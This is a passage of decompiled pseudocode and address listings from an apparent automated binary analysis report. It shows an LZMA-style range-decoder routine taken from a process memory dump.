              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											__eax =  *(__ebp - 0x28);
              											goto L89;
              										case 0xb:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L89:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L90:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L100:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t335 = __ebp - 0x70;
              											 *_t335 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t335;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L102;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												goto L58;
              											}
              										case 0x10:
              											L110:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t366 = __ebp - 0x70;
              											 *_t366 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t366;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L112;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											L132:
              											 *(_t612 - 0x54) = _t605;
              											goto L133;
              										case 0x12:
              											goto L0;
              										case 0x13:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												goto L144;
              											}
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											goto L130;
              										case 0x14:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											L140:
              											 *(_t612 - 0x88) = _t533;
              											goto L1;
              										case 0x15:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L121;
              										case 0x16:
              											__eax =  *(__ebp - 0x30);
              											__eflags = __eax - 4;
              											if(__eax >= 4) {
              												_push(3);
              												_pop(__eax);
              											}
              											__ecx =  *(__ebp - 4);
              											 *(__ebp - 0x40) = 6;
              											__eax = __eax << 7;
              											 *(__ebp - 0x7c) = 0x19;
              											 *(__ebp - 0x58) = __eax;
              											goto L145;
              										case 0x17:
              											goto L145;
              										case 0x18:
              											L146:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x18;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t484 = __ebp - 0x70;
              											 *_t484 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t484;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L148:
              											_t487 = __ebp - 0x48;
              											 *_t487 =  *(__ebp - 0x48) - 1;
              											__eflags =  *_t487;
              											goto L149;
              										case 0x19:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												 *(__ebp - 0x2c) = __ebx;
              												L120:
              												_t394 = __ebp - 0x2c;
              												 *_t394 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t394;
              												L121:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t401 = __ebp - 0x60;
              												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t401;
              												goto L124;
              											}
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L103:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L109:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L113:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														_t392 = __ebp - 0x2c;
              														 *_t392 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t392;
              														goto L120;
              													}
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L112:
              														_t369 = __ebp - 0x48;
              														 *_t369 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t369;
              														goto L113;
              													} else {
              														goto L110;
              													}
              												}
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L102:
              													_t339 = __ebp - 0x48;
              													 *_t339 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t339;
              													goto L103;
              												} else {
              													goto L100;
              												}
              											}
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L109;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L80;
              										case 0x1b:
              											L76:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t275 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t275;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t284 = __ebp - 0x64;
              											 *_t284 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t284;
              											 *( *(__ebp - 0x68)) = __cl;
              											L80:
              											 *(__ebp - 0x14) = __edx;
              											goto L81;
              										case 0x1c:
              											while(1) {
              												L124:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t415 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t415;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t415;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L81:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											 *(__ebp - 0x88) = 0x1c;
              											L170:
              											_push(0x22);
              											_pop(_t567);
              											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
              											_t535 = 0;
              											L172:
              											return _t535;
              									}
              								}
              								L171:
              								_t535 = _t534 | 0xffffffff;
              								goto L172;
              							}
              						}
              						__eax =  *(__ebp - 0x50);
              						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              						__eax =  *(__ebp - 0x58);
              						__esi = __edx + __eax;
              						 *(__ebp - 0x54) = __esi;
              						__ax =  *__esi;
              						__edi = __ax & 0x0000ffff;
              						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              						if( *(__ebp - 0xc) >= __ecx) {
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              							__cx = __ax;
              							__cx = __ax >> 5;
              							__eax = __eax - __ecx;
              							__edx = __edx + 1;
              							 *__esi = __ax;
              							 *(__ebp - 0x50) = __edx;
              						} else {
              							 *(__ebp - 0x10) = __ecx;
              							0x800 = 0x800 - __edi;
              							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              							 *__esi = __cx;
              						}
              						if( *(__ebp - 0x10) >= 0x1000000) {
              							goto L148;
              						} else {
              							goto L146;
              						}
              					}
              					goto L1;
              				}
              			}








              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00000000
              0x0040737e
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x00000000
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00407420
              0x00000000
              0x00407295

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
